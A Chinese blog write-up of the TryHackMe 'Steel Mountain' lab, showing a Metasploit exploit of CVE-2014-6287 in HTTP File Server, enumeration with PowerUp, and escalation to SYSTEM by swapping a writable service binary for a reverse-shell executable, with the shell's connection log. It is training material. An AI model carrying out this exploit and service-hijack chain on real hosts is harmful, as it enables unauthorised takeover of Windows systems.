TryHackMe-进攻性渗透测试-01_Steel Mountain

Steel Mountain

在此会议室中,您将枚举Windows计算机,使用Metasploit获得初始访问权限,使用Powershell进一步枚举计算机并将权限升级到管理员。


循例 nmap 扫

一大堆端口,其中有80、8080、145、139、445、3389…

进入8080的web页面看到是HTTP File Server v2.3

searchsploit搜索相关版本的cve

CVE-2014-6287

进入msfconsole:

search CVE-2014-6287
use 0

设置好相关的参数并运行exp,getshell

type C:\Users\bill\Desktop\user.txt
b04763b6fcf51fcd7c13abc7db4fd365

权限提升:

利用PowUp.ps1收集相关信息

meterpreter> upload /PowUp.ps1
             load powershell
             powershell_shell

powershell> . .\PowerUp.ps1
            Invoke-AllChecks

CanRestart 选项为 true,允许我们在系统上重新启动服务,应用程序的目录也是可写的。这意味着我们可以用恶意应用程序替换合法应用程序,重新启动服务,这将运行我们受感染的程序!

上传revserse shell到目标:

meterpreter > upload /home/sugobet/rev_exe.exe

回到cmd:

copy ./rev_exe.exe "C:\....."
sc stop serviceName
sc start serviceName

成功提权

Ncat: Connection from 10.10.16.205.
Ncat: Connection from 10.10.16.205:49277.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

不使用metasploit也可以,道理是一样的,不演示。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sugobet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值